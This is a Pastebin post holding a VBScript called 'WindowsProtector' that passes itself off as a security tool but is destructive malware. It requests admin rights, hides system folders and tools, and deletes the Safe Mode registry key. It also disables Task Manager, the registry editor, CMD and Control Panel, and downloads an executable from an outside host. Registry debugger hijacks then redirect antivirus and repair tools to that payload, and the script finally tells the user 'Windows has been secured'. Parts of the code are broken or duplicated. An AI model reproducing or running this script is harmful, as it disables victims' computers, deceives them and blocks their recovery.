API tools faq
paste
Advertisement
Joker0day

WindowsProtector rem

Joker0day
Dec 20th, 2017
237
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 10.24 KB | None | 0 0
raw download clone embed print report
  1. Rem WindowsProtector
  2.  
  3.  
  4.  
  5.  
  6.  
  7.  
  8.  
  9. If WScript.Arguments.Named.Exists("elevated") = False Then
  10.   CreateObject("Shell.Application").ShellExecute "wscript.exe", """" & WScript.ScriptFullName & """ /elevated", "", "runas", 1
  11.   WScript.Quit
  12. End If
  13. User = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%UserProfile%")
  14. dim Reg, fso, Eater
  15. Set Reg = CreateObject("WScript.Shell")
  16. Set fso = CreateObject("Scripting.FileSystemObject")
  17. Set Eater = fso.GetFile(Wscript.ScriptFullName)
  18. SlapClap
  19. HideFiles
  20. BolbisName
  21. Write2
  22. RunBat
  23. Holder
  24. BolbiMessage
  25. Write1
  26. CounterRemoval
  27. Success
  28.  
  29. Sub SlapClap
  30. Dim oFSO
  31. Set oFSO = CreateObject("Scripting.FileSystemObject")
  32. oFSO.CreateFolder("C:\Users\Public\ghostroot")
  33. End Sub
  34.  
  35. Sub HideBolbi
  36. Set fso = CreateObject("Scripting.FileSystemObject")
  37. Set Invisible1 = fso.getFolder("C:\Windows\")
  38. Set Invisible2 = fso.getFolder("C:\Windows\System32")
  39. Set Invisible3 = fso.getFile("C:\Windows\regedit.exe")
  40. Set Invisible4 = fso.getFile("C:\Windows\system32\regedit32.exe")
  41. Set Invisible5 = fso.getFile("C:\Windows\system32\cmd.exe")
  42. Set Invisible6 = fso.getFile("C:\Windows\system32\taskmgr.exe")
  43. Set Invisible7 = fso.getFile("C:\Windows\system32\gpedit.msc")
  44. Set Invisible8 = fso.getFolder("C:\Users\Public\ghostroot")
  45. Invisible1.Attributes = Invisible1.Attributes or 2 ' 2 = hidden
  46. Invisible2.Attributes = Invisible2.Attributes or 2 ' 2 = hidden
  47. Invisible3.Attributes = Invisible3.Attributes or 2 ' 2 = hidden
  48. Invisible4.Attributes = Invisible4.Attributes or 2 ' 2 = hidden
  49. Invisible5.Attributes = Invisible5.Attributes or 2 ' 2 = hidden
  50. Invisible6.Attributes = Invisible6.Attributes or 2 ' 2 = hidden
  51. Invisible7.Attributes = Invisible7.Attributes or 2 ' 2 = hidden
  52. Invisible8.Attributes = Invisible8.Attributes or 2 ' 2 = hidden
  53. End Sub
  54.  
  55. Sub BolbisName
  56. On Error Resume Next
  57. reg.regwrite "HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName\ComputerName","Bolbi", "REG_SZ"
  58. reg.regwrite "HKCU\Control Panel\Interational\s1159","Bolbi", "REG_SZ"
  59. reg.regwrite "HKCU\Control Panel\International\s2359","Bolbi", "REG_SZ"
  60. End Sub
  61.  
  62. Sub Success
  63. MsgBox("Windows has been secured")
  64. End Sub
  65.  
  66. Sub Write1
  67. Set fso = CreateObject("Scripting.FileSystemObject")
  68. set shell=CreateObject("Wscript.Shell")
  69. Set file = fso.CreateTextFile("C:\Users\Public\Ghostroot\Nope666666.msc")
  70. Set HideThis = fso.getFile("C:\Users\Public\Ghostroot\Nope666666.msc")
  71. HideThis.Attributes = HideThis.Attributes or 2 ' 2 = hidden
  72. file.Write "Not happening dude "
  73. End Sub
  74.  
  75. Sub Write2
  76. Set fso = CreateObject("Scripting.FileSystemObject")
  77. set shell=CreateObject("Wscript.Shell")
  78. Set file = fso.CreateTextFile("C:\Users\Public\Ghostroot\Nope.bat")
  79. Set HideThis = fso.getFile("C:\Users\Public\Ghostroot\Nope.bat")
  80. HideThis.Attributes = HideThis.Attributes or 2 ' 2 = hidden
  81. file.Write "@echo off "
  82. file.WriteBlankLines(1)
  83. file.Write "REG delete HKLM\System\CurrentControlSet\Control\SafeBoot /f"
  84. file.WriteBlankLines(1)
  85. file.Write "REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel /f"
  86. file.WriteBlankLines(1)
  87. file.Write "REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableLockWorkstation /f"
  88. file.WriteBlankLines(1)
  89. End Sub
  90.  
  91. Sub RunBat
  92. Dim Shell
  93. Set Shell = CreateObject("Wscript.Shell")
  94. Shell.run "C:\Users\Public\Ghostroot\Nope.Bat"
  95. End Sub
  96.  
  97. Sub Holder
  98. WScript.Sleep 10000
  99. Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "1", "REG_DWORD"
  100. Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1", "REG_DWORD"
  101. Reg.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
  102. Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel", "1", "REG_DWORD"
  103. Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableLockWorkstation", "1", "REG_DWORD"
  104. End Sub
  105.  
  106. Sub BolbiMessage
  107. dim xHttp, bStrm
  108. Set xHttp = createobject("Microsoft.XMLHTTP")
  109. Set bStrm = createobject("Adodb.Stream")
  110.  xHttp.Open "GET", "http://i.pomf.pl/qljcsu.exe", False
  111.  xHttp.Send
  112.  
  113.  with bStrm
  114.  .type = 1
  115.  .open
  116. .write xHttp.responseBody
  117.  .savetofile "C:\Users\Public\ghostroot\qljcsu.exe", 2
  118. End With
  119. End Sub
  120.  
  121. Sub Write1
  122. Set fso = CreateObject("Scripting.FileSystemObject")
  123. Set file = fso.CreateTextFile(User & "\Desktop\Opps.txt")
  124. file.Write "HA HA HA HA HA"
  125. End Sub
  126.  
  127. Sub CounterRemoval
  128. WScript.Sleep 5000
  129. On Error Resume Next
  130. Reg.Write "HKCR\inffile\shell\Install\command\logoff.exe "
  131. Reg.Write "HKCR\regfile\shell\open\command\ logoff.exe "
  132. Reg.Write "HKCR\VBSFile\Shell\Edit\Command\logoff.exe "
  133. Reg.Write "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1", "REG_DWORD"
  134. Reg.Write "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1", "REG_DWORD"
  135. Reg.Write "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
  136. Reg.write "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions" , "1", "REG_DWORD"
  137. Reg.write "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileAssociate", "1", "REG_DWORD"
  138. Reg.write "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileAssociate", "1", "REG_DWORD"
  139. Reg.write "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
  140. Reg.write "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
  141. Reg.write "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
  142. Reg.write "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
  143. Command%20Prompt%20Portable/CommandPromptPortable_2.4.paf.exe
  144. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msert.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  145. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TaskKiller.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  146. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mssecse.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  147. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  148. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  149. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  150. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner32.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  151. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner64.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  152. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vbsedit.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  153. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\htaedit.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  154. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VirtualBox.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  155. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  156. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uTorrent.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  157. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uninstall.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  158. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad++.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  159. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adwcleaner_5.005.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  160. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\student.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  161. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gpedit.msc\Debugger","C:\Users\Public\Ghostroot\Nope666666.msc"
  162. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  163. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  164. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  165. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  166. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  167. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TaskMgr.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  168. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\attrib.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  169. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  170. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  171. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\installer.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  172. Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD", "1", "REG_DWORD"
  173. Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
  174. End Sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!